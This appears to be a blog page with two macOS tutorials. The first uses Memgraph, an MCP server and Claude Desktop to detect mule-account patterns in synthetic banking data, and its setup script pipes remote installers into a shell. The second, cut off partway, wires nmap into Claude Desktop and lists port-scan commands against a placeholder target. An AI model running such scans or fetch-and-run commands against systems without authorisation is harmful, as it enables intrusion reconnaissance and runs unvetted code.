macOS: Getting Started with Memgraph, the Memgraph MCP Server, and Claude Desktop by Analyzing Test Banking Data for Mule Accounts

1. Introduction

This guide walks you through setting up Memgraph with Claude Desktop on your laptop to analyze relationships between mule accounts in banking systems. By the end of this tutorial, you’ll have a working setup where Claude can query and visualize banking transaction patterns to identify potential mule account networks.

Why Graph Databases for Fraud Detection?

Traditional relational databases store data in tables with rows and columns, which works well for structured, tabular data. However, fraud detection requires understanding relationships between entities, and this is where graph databases excel.

In fraud investigation, the connections matter more than the entities themselves:

  • Follow the money: Tracing funds through multiple accounts requires traversing relationships, not joining tables
  • Multi-hop queries: Finding patterns like “accounts connected within 3 transactions” is natural in graphs but complex in SQL
  • Pattern matching: Detecting suspicious structures (like a controller account distributing to multiple mules) is intuitive with graph queries
  • Real-time analysis: Graph databases can quickly identify new connections as transactions occur

Mule account schemes specifically benefit from graph analysis because they form distinct network patterns:

  • A central controller account receives large deposits
  • Funds are rapidly distributed to multiple recruited “mule” accounts
  • Mules quickly withdraw cash or transfer funds, completing the laundering cycle
  • These patterns create a recognizable “hub-and-spoke” topology in a graph

In a traditional relational database, finding these patterns requires multiple complex JOINs and recursive queries. In a graph database, you simply ask: “show me accounts connected to this one” or “find all paths between these two accounts.”
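For example, given the Account nodes and TRANSACTION relationships we create later in this guide, a multi-hop question becomes a one-line Cypher pattern (a sketch; the labels and properties match the test data set up below):

```cypher
// Accounts reachable from ACC007 within three transaction hops
MATCH path = (src:Account {account_id: 'ACC007'})-[:TRANSACTION *1..3]->(dst:Account)
RETURN DISTINCT dst.account_id;
```

The equivalent in SQL would need a recursive CTE over a transactions table; here the traversal depth is just the `*1..3` bound on the pattern.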

Why This Stack?

We’ve chosen a powerful combination of technologies that work seamlessly together:

Memgraph (Graph Database)

  • Native graph database built for speed and real-time analytics
  • Uses Cypher query language (intuitive, SQL-like syntax for graphs)
  • In-memory architecture provides millisecond query responses
  • Perfect for fraud detection where you need to explore relationships quickly
  • Lightweight and runs easily in Docker on your laptop
  • Open-source with excellent tooling (Memgraph Lab for visualization)

Claude Desktop (AI Interface)

  • Natural language interface eliminates the need to learn Cypher query syntax
  • Ask questions in plain English: “Which accounts received money from ACC006?”
  • Claude translates your questions into optimized graph queries automatically
  • Provides explanations and insights alongside query results
  • Dramatically lowers the barrier to entry for graph analysis

MCP (Model Context Protocol)

  • Connects Claude directly to Memgraph
  • Enables Claude to execute queries and retrieve real-time data
  • Secure, local connection—your data never leaves your machine
  • Extensible architecture allows adding other tools and databases

Why Not PostgreSQL?

While PostgreSQL is excellent for transactional data storage, graph relationships in SQL require:

  • Complex recursive CTEs (Common Table Expressions) for multi-hop queries
  • Multiple JOINs that become exponentially slower as relationships deepen
  • Manual construction of relationship paths
  • Limited visualization capabilities for network structures

Memgraph’s native graph model represents accounts and transactions as nodes and edges, making relationship queries natural and performant. For fraud detection where you need to quickly explore “who’s connected to whom,” graph databases are the right tool.

What You’ll Build

By following this guide, you’ll create:

  • A local Memgraph database with 57 accounts and roughly 500 transactions
  • A realistic mule account network hidden among legitimate transactions
  • An AI-powered analysis interface through Claude Desktop
  • The ability to ask natural language questions and get instant graph insights

2. Prerequisites

Before starting, ensure you have:

  • macOS laptop
  • Homebrew package manager (the script installs it if needed)
  • Claude Desktop app installed
  • Basic terminal knowledge

3. Automated Setup

Below is one large script. It started life as several smaller scripts, but they have since merged into a single hazardous blob of bash. It ships under the “it works on my laptop” disclaimer!

cat > ~/setup_memgraph_complete.sh << 'EOF'
#!/bin/bash

# Complete automated setup for Memgraph + Claude Desktop

echo "========================================"
echo "Memgraph + Claude Desktop Setup"
echo "========================================"
echo ""

# Step 1: Install Rancher Desktop
echo "Step 1/7: Installing Rancher Desktop..."

# Check if Docker daemon is already running
DOCKER_RUNNING=false
if command -v docker &> /dev/null && docker info &> /dev/null 2>&1; then
    echo "Container runtime is already running!"
    DOCKER_RUNNING=true
fi

if [ "$DOCKER_RUNNING" = false ]; then
    # Check if Homebrew is installed
    if ! command -v brew &> /dev/null; then
        echo "Installing Homebrew first..."
        /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
        
        # Add Homebrew to PATH for Apple Silicon Macs
        if [[ $(uname -m) == 'arm64' ]]; then
            echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> ~/.zprofile
            eval "$(/opt/homebrew/bin/brew shellenv)"
        fi
    fi
    
    # Check if Rancher Desktop is installed
    RANCHER_INSTALLED=false
    if brew list --cask rancher 2>/dev/null | grep -q rancher; then
        RANCHER_INSTALLED=true
        echo "Rancher Desktop is installed via Homebrew."
    fi
    
    # If not installed, install it
    if [ "$RANCHER_INSTALLED" = false ]; then
        echo "Installing Rancher Desktop..."
        brew install --cask rancher
        sleep 3
    fi
    
    echo "Starting Rancher Desktop..."
    
    # Launch Rancher Desktop
    if [ -d "/Applications/Rancher Desktop.app" ]; then
        echo "Launching Rancher Desktop from /Applications..."
        open "/Applications/Rancher Desktop.app"
        sleep 5
    else
        echo ""
        echo "Please launch Rancher Desktop manually:"
        echo "  1. Press Cmd+Space"
        echo "  2. Type 'Rancher Desktop'"
        echo "  3. Press Enter"
        echo ""
        echo "Waiting for you to launch Rancher Desktop..."
        echo "Press Enter once you've started Rancher Desktop"
        read
    fi
    
    # Add Rancher Desktop to PATH
    export PATH="$HOME/.rd/bin:$PATH"
    
    echo "Waiting for container runtime to start (this may take 30-60 seconds)..."
    # Wait for docker command to become available
    for i in {1..60}; do
        if command -v docker &> /dev/null && docker info &> /dev/null 2>&1; then
            echo ""
            echo "Container runtime is running!"
            break
        fi
        echo -n "."
        sleep 3
    done
    
    if ! command -v docker &> /dev/null || ! docker info &> /dev/null 2>&1; then
        echo ""
        echo "Rancher Desktop is taking longer than expected. Please:"
        echo "1. Wait for Rancher Desktop to fully initialize"
        echo "2. Accept any permissions requests"
        echo "3. Once you see 'Kubernetes is running' in Rancher Desktop, press Enter"
        read
        
        # Try to add Rancher Desktop to PATH
        export PATH="$HOME/.rd/bin:$PATH"
        
        # Check one more time
        if ! command -v docker &> /dev/null || ! docker info &> /dev/null 2>&1; then
            echo "Container runtime still not responding."
            echo "Please ensure Rancher Desktop is fully started and try again."
            exit 1
        fi
    fi
fi

# Ensure docker is in PATH for the rest of the script
export PATH="$HOME/.rd/bin:$PATH"

echo ""
echo "Step 2/7: Installing Memgraph container..."

# Stop and remove existing container if it exists
if docker ps -a 2>/dev/null | grep -q memgraph; then
    echo "Removing existing Memgraph container..."
    docker stop memgraph 2>/dev/null || true
    docker rm memgraph 2>/dev/null || true
fi

docker pull memgraph/memgraph-platform || { echo "Failed to pull Memgraph image"; exit 1; }
docker run -d -p 7687:7687 -p 7444:7444 -p 3000:3000 \
  --name memgraph \
  -v memgraph_data:/var/lib/memgraph \
  memgraph/memgraph-platform || { echo "Failed to start Memgraph container"; exit 1; }

echo "Waiting for Memgraph to be ready..."
sleep 10

echo ""
echo "Step 3/7: Installing Python and Memgraph MCP server..."

# Install Python if not present
if ! command -v python3 &> /dev/null; then
    echo "Installing Python..."
    brew install python3
fi

# Install uv package manager
if ! command -v uv &> /dev/null; then
    echo "Installing uv package manager..."
    curl -LsSf https://astral.sh/uv/install.sh | sh
    export PATH="$HOME/.local/bin:$PATH"
fi

echo "Memgraph MCP will be configured to run via uv..."

echo ""
echo "Step 4/7: Configuring Claude Desktop..."

CONFIG_DIR="$HOME/Library/Application Support/Claude"
CONFIG_FILE="$CONFIG_DIR/claude_desktop_config.json"

mkdir -p "$CONFIG_DIR"

if [ -f "$CONFIG_FILE" ] && [ -s "$CONFIG_FILE" ]; then
    echo "Backing up existing Claude configuration..."
    cp "$CONFIG_FILE" "$CONFIG_FILE.backup.$(date +%s)"
fi

# Get the full path to uv
UV_PATH=$(which uv 2>/dev/null || echo "$HOME/.local/bin/uv")

# Merge memgraph config with existing config
if [ -f "$CONFIG_FILE" ] && [ -s "$CONFIG_FILE" ]; then
    echo "Merging memgraph config with existing MCP servers..."
    
    # Use Python to merge JSON (more reliable than jq which may not be installed)
    python3 << PYTHON_MERGE
import json
import sys

config_file = "$CONFIG_FILE"
uv_path = "${UV_PATH}"

try:
    # Read existing config
    with open(config_file, 'r') as f:
        config = json.load(f)
    
    # Ensure mcpServers exists
    if 'mcpServers' not in config:
        config['mcpServers'] = {}
    
    # Add/update memgraph server
    config['mcpServers']['memgraph'] = {
        "command": uv_path,
        "args": [
            "run",
            "--with",
            "mcp-memgraph",
            "--python",
            "3.13",
            "mcp-memgraph"
        ],
        "env": {
            "MEMGRAPH_HOST": "localhost",
            "MEMGRAPH_PORT": "7687"
        }
    }
    
    # Write merged config
    with open(config_file, 'w') as f:
        json.dump(config, f, indent=2)
    
    print("Successfully merged memgraph config")
    sys.exit(0)
except Exception as e:
    print(f"Error merging config: {e}", file=sys.stderr)
    sys.exit(1)
PYTHON_MERGE
    
    if [ $? -ne 0 ]; then
        echo "Failed to merge config, creating new one..."
        cat > "$CONFIG_FILE" << JSON
{
  "mcpServers": {
    "memgraph": {
      "command": "${UV_PATH}",
      "args": [
        "run",
        "--with",
        "mcp-memgraph",
        "--python",
        "3.13",
        "mcp-memgraph"
      ],
      "env": {
        "MEMGRAPH_HOST": "localhost",
        "MEMGRAPH_PORT": "7687"
      }
    }
  }
}
JSON
    fi
else
    echo "Creating new Claude Desktop configuration..."
    cat > "$CONFIG_FILE" << JSON
{
  "mcpServers": {
    "memgraph": {
      "command": "${UV_PATH}",
      "args": [
        "run",
        "--with",
        "mcp-memgraph",
        "--python",
        "3.13",
        "mcp-memgraph"
      ],
      "env": {
        "MEMGRAPH_HOST": "localhost",
        "MEMGRAPH_PORT": "7687"
      }
    }
  }
}
JSON
fi

echo "Claude Desktop configured!"

echo ""
echo "Step 5/7: Setting up mgconsole..."
echo "mgconsole will be used via Docker (included in memgraph/memgraph-platform)"

echo ""
echo "Step 6/7: Setting up database schema..."

sleep 5  # Give Memgraph extra time to be ready

echo "Clearing existing data..."
echo "MATCH (n) DETACH DELETE n;" | docker exec -i memgraph mgconsole --host 127.0.0.1 --port 7687

echo "Creating indexes..."
cat <<'CYPHER' | docker exec -i memgraph mgconsole --host 127.0.0.1 --port 7687
CREATE INDEX ON :Account(account_id);
CREATE INDEX ON :Account(account_type);
CREATE INDEX ON :Person(person_id);
CYPHER

echo ""
echo "Step 7/7: Populating test data..."

echo "Loading core mule account data..."
cat <<'CYPHER' | docker exec -i memgraph mgconsole --host 127.0.0.1 --port 7687
CREATE (p1:Person {person_id: 'P001', name: 'John Smith', age: 45, risk_score: 'low'})
CREATE (a1:Account {account_id: 'ACC001', account_type: 'checking', balance: 15000, opened_date: '2020-01-15', status: 'active'})
CREATE (p1)-[:OWNS {since: '2020-01-15'}]->(a1)
CREATE (p2:Person {person_id: 'P002', name: 'Sarah Johnson', age: 38, risk_score: 'low'})
CREATE (a2:Account {account_id: 'ACC002', account_type: 'savings', balance: 25000, opened_date: '2019-06-10', status: 'active'})
CREATE (p2)-[:OWNS {since: '2019-06-10'}]->(a2)
CREATE (p3:Person {person_id: 'P003', name: 'Michael Brown', age: 22, risk_score: 'high'})
CREATE (a3:Account {account_id: 'ACC003', account_type: 'checking', balance: 500, opened_date: '2024-08-01', status: 'active'})
CREATE (p3)-[:OWNS {since: '2024-08-01'}]->(a3)
CREATE (p4:Person {person_id: 'P004', name: 'Lisa Chen', age: 19, risk_score: 'high'})
CREATE (a4:Account {account_id: 'ACC004', account_type: 'checking', balance: 300, opened_date: '2024-08-05', status: 'active'})
CREATE (p4)-[:OWNS {since: '2024-08-05'}]->(a4)
CREATE (p5:Person {person_id: 'P005', name: 'David Martinez', age: 21, risk_score: 'high'})
CREATE (a5:Account {account_id: 'ACC005', account_type: 'checking', balance: 450, opened_date: '2024-08-03', status: 'active'})
CREATE (p5)-[:OWNS {since: '2024-08-03'}]->(a5)
CREATE (p6:Person {person_id: 'P006', name: 'Robert Wilson', age: 35, risk_score: 'critical'})
CREATE (a6:Account {account_id: 'ACC006', account_type: 'business', balance: 2000, opened_date: '2024-07-15', status: 'active'})
CREATE (p6)-[:OWNS {since: '2024-07-15'}]->(a6)
CREATE (p7:Person {person_id: 'P007', name: 'Unknown Entity', risk_score: 'critical'})
CREATE (a7:Account {account_id: 'ACC007', account_type: 'business', balance: 150000, opened_date: '2024-06-01', status: 'active'})
CREATE (p7)-[:OWNS {since: '2024-06-01'}]->(a7)
CREATE (a7)-[:TRANSACTION {transaction_id: 'TXN001', amount: 50000, timestamp: '2024-09-01T10:15:00', type: 'wire_transfer', flagged: true}]->(a6)
CREATE (a6)-[:TRANSACTION {transaction_id: 'TXN002', amount: 9500, timestamp: '2024-09-01T14:30:00', type: 'transfer', flagged: true}]->(a3)
CREATE (a6)-[:TRANSACTION {transaction_id: 'TXN003', amount: 9500, timestamp: '2024-09-01T14:32:00', type: 'transfer', flagged: true}]->(a4)
CREATE (a6)-[:TRANSACTION {transaction_id: 'TXN004', amount: 9500, timestamp: '2024-09-01T14:35:00', type: 'transfer', flagged: true}]->(a5)
CREATE (a3)-[:TRANSACTION {transaction_id: 'TXN005', amount: 9000, timestamp: '2024-09-02T09:00:00', type: 'cash_withdrawal', flagged: true}]->(a6)
CREATE (a4)-[:TRANSACTION {transaction_id: 'TXN006', amount: 9000, timestamp: '2024-09-02T09:15:00', type: 'cash_withdrawal', flagged: true}]->(a6)
CREATE (a5)-[:TRANSACTION {transaction_id: 'TXN007', amount: 9000, timestamp: '2024-09-02T09:30:00', type: 'cash_withdrawal', flagged: true}]->(a6)
CREATE (a7)-[:TRANSACTION {transaction_id: 'TXN008', amount: 45000, timestamp: '2024-09-15T11:20:00', type: 'wire_transfer', flagged: true}]->(a6)
CREATE (a6)-[:TRANSACTION {transaction_id: 'TXN009', amount: 9800, timestamp: '2024-09-15T15:00:00', type: 'transfer', flagged: true}]->(a3)
CREATE (a6)-[:TRANSACTION {transaction_id: 'TXN010', amount: 9800, timestamp: '2024-09-15T15:05:00', type: 'transfer', flagged: true}]->(a4)
CREATE (a1)-[:TRANSACTION {transaction_id: 'TXN011', amount: 150, timestamp: '2024-09-10T12:00:00', type: 'debit_card', flagged: false}]->(a2)
CREATE (a2)-[:TRANSACTION {transaction_id: 'TXN012', amount: 1000, timestamp: '2024-09-12T10:00:00', type: 'transfer', flagged: false}]->(a1);
CYPHER

echo "Loading noise data (50 accounts, 500 transactions)..."
cat <<'CYPHER' | docker exec -i memgraph mgconsole --host 127.0.0.1 --port 7687
UNWIND range(1, 50) AS i
WITH i,
     ['Alice', 'Bob', 'Carol', 'David', 'Emma', 'Frank', 'Grace', 'Henry', 'Iris', 'Jack',
      'Karen', 'Leo', 'Mary', 'Nathan', 'Olivia', 'Peter', 'Quinn', 'Rachel', 'Steve', 'Tina',
      'Uma', 'Victor', 'Wendy', 'Xavier', 'Yara', 'Zack', 'Amy', 'Ben', 'Chloe', 'Daniel',
      'Eva', 'Fred', 'Gina', 'Hugo', 'Ivy', 'James', 'Kate', 'Luke', 'Mia', 'Noah',
      'Opal', 'Paul', 'Rosa', 'Sam', 'Tara', 'Umar', 'Vera', 'Will', 'Xena', 'Yuki'] AS firstNames,
     ['Anderson', 'Baker', 'Clark', 'Davis', 'Evans', 'Foster', 'Garcia', 'Harris', 'Irwin', 'Jones',
      'King', 'Lopez', 'Miller', 'Nelson', 'Owens', 'Parker', 'Quinn', 'Reed', 'Scott', 'Taylor',
      'Underwood', 'Vargas', 'White', 'Young', 'Zhao', 'Adams', 'Brooks', 'Collins', 'Duncan', 'Ellis'] AS lastNames,
     ['checking', 'savings', 'checking', 'savings', 'checking'] AS accountTypes,
     ['low', 'low', 'low', 'medium', 'low'] AS riskScores,
     ['2018-03-15', '2018-07-22', '2019-01-10', '2019-05-18', '2019-09-30', '2020-02-14', '2020-06-25', '2020-11-08', '2021-04-17', '2021-08-29', '2022-01-20', '2022-05-12', '2022-10-03', '2023-02-28', '2023-07-15'] AS dates
WITH i,
     firstNames[toInteger(rand() * size(firstNames))] + ' ' + lastNames[toInteger(rand() * size(lastNames))] AS fullName,
     accountTypes[toInteger(rand() * size(accountTypes))] AS accType,
     riskScores[toInteger(rand() * size(riskScores))] AS risk,
     toInteger(rand() * 40 + 25) AS age,
     toInteger(rand() * 80000 + 1000) AS balance,
     dates[toInteger(rand() * size(dates))] AS openDate
CREATE (p:Person {person_id: 'NOISE_P' + toString(i), name: fullName, age: age, risk_score: risk})
CREATE (a:Account {account_id: 'NOISE_ACC' + toString(i), account_type: accType, balance: balance, opened_date: openDate, status: 'active'})
CREATE (p)-[:OWNS {since: openDate}]->(a);
UNWIND range(1, 500) AS i
WITH i,
     toInteger(rand() * 50 + 1) AS fromIdx,
     toInteger(rand() * 50 + 1) AS toIdx,
     ['transfer', 'debit_card', 'check', 'atm_withdrawal', 'direct_deposit', 'wire_transfer', 'mobile_payment'] AS txnTypes,
     ['2024-01-15', '2024-02-20', '2024-03-10', '2024-04-05', '2024-05-18', '2024-06-22', '2024-07-14', '2024-08-09', '2024-09-25', '2024-10-30'] AS dates
WHERE fromIdx <> toIdx
WITH i, fromIdx, toIdx, txnTypes, dates,
     txnTypes[toInteger(rand() * size(txnTypes))] AS txnType,
     toInteger(rand() * 5000 + 10) AS amount,
     (rand() < 0.05) AS shouldFlag,
     dates[toInteger(rand() * size(dates))] AS txnDate
MATCH (from:Account {account_id: 'NOISE_ACC' + toString(fromIdx)})
MATCH (to:Account {account_id: 'NOISE_ACC' + toString(toIdx)})
CREATE (from)-[:TRANSACTION {
    transaction_id: 'NOISE_TXN' + toString(i),
    amount: amount,
    timestamp: txnDate + 'T' + toString(toInteger(rand() * 24)) + ':' + toString(toInteger(rand() * 60)) + ':00',
    type: txnType,
    flagged: shouldFlag
}]->(to);
CYPHER

echo ""
echo "========================================"
echo "Setup Complete!"
echo "========================================"
echo ""
echo "Next steps:"
echo "1. Restart Claude Desktop (Quit and reopen)"
echo "2. Open Memgraph Lab at http://localhost:3000"
echo "3. Start asking Claude questions about the mule account data!"
echo ""
echo "Example query: 'Show me all accounts owned by people with high or critical risk scores in Memgraph'"
echo ""

EOF

chmod +x ~/setup_memgraph_complete.sh
~/setup_memgraph_complete.sh

The script will:

  1. Install Rancher Desktop (if not already installed)
  2. Install Homebrew (if needed)
  3. Pull and start the Memgraph container
  4. Install Python and the uv package manager (which runs the Memgraph MCP server)
  5. Configure Claude Desktop automatically
  6. Set up mgconsole (run via Docker; it ships inside the Memgraph image)
  7. Set up the database schema with indexes
  8. Populate it with mule account data and roughly 500 noise transactions

After the script completes, restart Claude Desktop (quit and reopen) for the MCP configuration to take effect.

4. Verifying the Setup

Verify the setup by accessing Memgraph Lab at http://localhost:3000 or using mgconsole via Docker:

docker exec -it memgraph mgconsole --host 127.0.0.1 --port 7687

In mgconsole, run:

MATCH (n) RETURN count(n);

You should see 114 nodes (7 core persons, 7 core accounts, 50 noise persons, and 50 noise accounts):

+----------+
| count(n) |
+----------+
| 114      |
+----------+
1 row in set (round trip in 0.002 sec)

Check the transaction relationships:

MATCH ()-[r:TRANSACTION]->() RETURN count(r);

You should see a count just over 500: the 12 core transactions plus up to 500 noise transactions. A few noise transactions are dropped when the random generator picks the same account as both source and destination, so the exact count varies slightly between runs:

+----------+
| count(r) |
+----------+
| 501      |
+----------+
1 row in set (round trip in 0.002 sec)

Verify the mule accounts are still identifiable:

MATCH (p:Person)-[:OWNS]->(a:Account)
WHERE p.risk_score IN ['high', 'critical']
RETURN p.name, a.account_id, p.risk_score
ORDER BY p.risk_score DESC;

This should return the 5 suspicious accounts from our mule network:

+------------------+------------------+------------------+
| p.name           | a.account_id     | p.risk_score     |
+------------------+------------------+------------------+
| "Michael Brown"  | "ACC003"         | "high"           |
| "Lisa Chen"      | "ACC004"         | "high"           |
| "David Martinez" | "ACC005"         | "high"           |
| "Robert Wilson"  | "ACC006"         | "critical"       |
| "Unknown Entity" | "ACC007"         | "critical"       |
+------------------+------------------+------------------+
5 rows in set (round trip in 0.002 sec)

5. Using Claude with Memgraph

Now that everything is set up, you can interact with Claude Desktop to analyze the mule account network. Here are example queries you can try:

Example 1: Find All High-Risk Accounts

Ask Claude:

Show me all accounts owned by people with high or critical risk scores in Memgraph

Claude will query Memgraph and return results showing the suspicious accounts (ACC003, ACC004, ACC005, ACC006, ACC007), filtering out the 50+ noise accounts.

Example 2: Identify Transaction Patterns

Ask Claude:

Find all accounts that received money from ACC006 within a 24-hour period. Show the transaction amounts and timestamps.

Claude will identify the three mule accounts (ACC003, ACC004, ACC005) that received similar amounts in quick succession.
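A Cypher query Claude might generate for this looks roughly like the following (a sketch; the exact query will vary):

```cypher
// Outgoing transfers from the suspected controller account
MATCH (a:Account {account_id: 'ACC006'})-[t:TRANSACTION]->(b:Account)
RETURN b.account_id, t.amount, t.timestamp
ORDER BY t.timestamp;
```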

Example 3: Trace Money Flow

Ask Claude:

Trace the flow of money from ACC007 through the network. Show me the complete transaction path.

Claude will visualize the path: ACC007 -> ACC006 -> [ACC003, ACC004, ACC005], revealing the laundering pattern.
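Under the hood this is a variable-length path match; a sketch of the kind of query involved:

```cypher
// Transaction routes starting at the source account
MATCH path = (src:Account {account_id: 'ACC007'})-[:TRANSACTION *1..2]->(dst:Account)
RETURN [n IN nodes(path) | n.account_id] AS route;
```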

Example 4: Calculate Total Funds

Ask Claude:

Calculate the total amount of money that flowed through ACC006 in September 2024

Claude will aggregate all incoming and outgoing transactions for the controller account.
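A plausible aggregation query (a sketch; it leans on the fact that the test data stores timestamps as ISO strings, so a prefix match selects the month):

```cypher
// Total transaction volume through ACC006 during September 2024
MATCH (a:Account {account_id: 'ACC006'})-[t:TRANSACTION]-()
WHERE t.timestamp STARTS WITH '2024-09'
RETURN sum(t.amount) AS total_flow;
```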

Example 5: Find Rapid Withdrawal Patterns

Ask Claude:

Find accounts where money was withdrawn within 48 hours of being deposited. What are the amounts and account holders?

This reveals the classic mule account behavior of quick cash extraction.
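One way to express this in Cypher (a sketch only: the timestamps are stored as ISO strings, so this assumes Memgraph's localDateTime() can parse them and that duration arithmetic is available):

```cypher
// Accounts that sent funds out within 48 hours of receiving them
MATCH ()-[tin:TRANSACTION]->(a:Account)-[tout:TRANSACTION]->()
WHERE tout.type = 'cash_withdrawal'
  AND localDateTime(tin.timestamp) <= localDateTime(tout.timestamp)
  AND localDateTime(tout.timestamp) <= localDateTime(tin.timestamp) + duration({hour: 48})
RETURN a.account_id, tin.amount AS deposited, tout.amount AS withdrawn;
```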

Example 6: Network Analysis

Ask Claude:

Show me all accounts that have transaction relationships with ACC006. Create a visualization of this network.

Claude will generate a graph showing the controller account at the center with connections to both the source and mule accounts.

Example 7: Risk Assessment

Ask Claude:

Which accounts have received flagged transactions totaling more than $15,000? List them by total amount.

This helps identify which mule accounts have processed the most illicit funds.
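A query along these lines would do the grouping (a sketch; the exact query Claude produces will vary):

```cypher
// Accounts receiving more than $15,000 in flagged transactions
MATCH ()-[t:TRANSACTION {flagged: true}]->(a:Account)
WITH a, sum(t.amount) AS total_flagged
WHERE total_flagged > 15000
RETURN a.account_id, total_flagged
ORDER BY total_flagged DESC;
```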

6. Understanding the Graph Visualization

When Claude displays graph results, you’ll see:

  • Nodes: Circles representing accounts and persons
  • Edges: Lines representing transactions or ownership relationships
  • Properties: Attributes like amounts, timestamps, and risk scores

The graph structure makes it easy to spot:

  • Central nodes (controllers) with many connections
  • Similar transaction patterns across multiple accounts
  • Timing correlations between related transactions
  • Isolation of legitimate vs. suspicious account clusters

7. Advanced Analysis Queries

Once you’re comfortable with basic queries, try these advanced analyses:

Community Detection

Ask Claude:

Find groups of accounts that frequently transact with each other. Are there separate communities in the network?

Temporal Analysis

Ask Claude:

Show me the timeline of transactions for accounts owned by people under 25 years old. Are there any patterns?
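The underlying query combines ownership and transaction patterns in a single match (a sketch against the test schema):

```cypher
// Transaction timeline for accounts owned by people under 25
MATCH (p:Person)-[:OWNS]->(a:Account)-[t:TRANSACTION]-()
WHERE p.age < 25
RETURN p.name, a.account_id, t.type, t.amount, t.timestamp
ORDER BY t.timestamp;
```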

Shortest Path Analysis

Ask Claude:

What's the shortest path of transactions between ACC007 and ACC003? How many hops does it take?
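Memgraph has built-in breadth-first search for exactly this question (a sketch using Memgraph's *BFS expansion syntax):

```cypher
// Shortest transaction path between the two accounts
MATCH path = (src:Account {account_id: 'ACC007'})-[:TRANSACTION *BFS]->(dst:Account {account_id: 'ACC003'})
RETURN path, size(relationships(path)) AS hops;
```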

8. Cleaning Up

When you’re done experimenting, you can stop and remove the Memgraph container:

docker stop memgraph
docker rm memgraph

To remove the data volume completely:

docker volume rm memgraph_data

To restart later with fresh data, just run the setup script again.

9. Troubleshooting

Container Runtime Not Running

If you get errors about Docker not running, launch Rancher Desktop and make sure its CLI tools are on your PATH:

open -a "Rancher Desktop"
export PATH="$HOME/.rd/bin:$PATH"

Wait for Rancher Desktop to finish initializing, then verify:

docker info

Memgraph Container Won’t Start

Check if ports are already in use:

lsof -i :7687
lsof -i :3000

Kill any conflicting processes or change the port mappings in the docker run command.

Claude Can’t Connect to Memgraph

Verify the MCP server configuration:

cat ~/Library/Application\ Support/Claude/claude_desktop_config.json

Ensure Memgraph is running:

docker ps | grep memgraph

Restart Claude Desktop completely after configuration changes.

mgconsole Command Not Found

This guide runs mgconsole inside the Memgraph container, so no local install is needed:

docker exec -it memgraph mgconsole --host 127.0.0.1 --port 7687

No Data Returned from Queries

Check if data was loaded successfully:

echo "MATCH (n) RETURN count(n);" | docker exec -i memgraph mgconsole --host 127.0.0.1 --port 7687

If the count is 0, rerun the setup script.

10. Next Steps

Now that you have a working setup, you can:

  • Add more complex transaction patterns
  • Implement real-time fraud detection rules
  • Create additional graph algorithms for anomaly detection
  • Connect to real banking data sources (with proper security)
  • Build automated alerting for suspicious patterns
  • Expand the schema to include IP addresses, devices, and locations

The combination of Memgraph’s graph database capabilities and Claude’s natural language interface makes it easy to explore and analyze complex relationship data without writing complex Cypher queries manually.

11. Conclusion

You now have a complete environment for analyzing banking mule accounts using Memgraph and Claude Desktop. The graph database structure naturally represents the relationships between accounts, making it ideal for fraud detection. Claude’s integration through MCP allows you to query and visualize this data using natural language, making sophisticated analysis accessible without deep technical knowledge.

The test dataset demonstrates typical mule account patterns: rapid movement of funds through multiple accounts, young account holders, recently opened accounts, and structured amounts designed to avoid reporting thresholds. These patterns are much easier to spot in a graph database than in traditional relational databases.

Experiment with different queries and explore how graph thinking can reveal hidden patterns in connected data.

macOS: Deep Dive into NMAP using Claude Desktop with an NMAP MCP Server

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

⚠️ Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation
nmap --version

On Linux (Ubuntu/Debian):

sudo apt update
sudo apt install -y nmap

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

Mac OS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

The most popular NMAP MCP server is available on GitHub. We’ll clone the repository and build it locally:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
USERNAME=$(whoami)

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

# Read the existing config, or start fresh if none exists yet
config = {}
if os.path.exists(config_file):
    with open(config_file, 'r') as f:
        config = json.load(f)

if 'mcpServers' not in config:
    config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
    "command": "node",
    "args": [
        f"/Users/{username}/nmap-mcp-server/dist/index.js"
    ],
    "env": {}
}

with open(config_file, 'w') as f:
    json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF


Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. You should see the NMAP MCP server listed among Claude’s connected tools (check the tools indicator near the chat input).

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services.

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

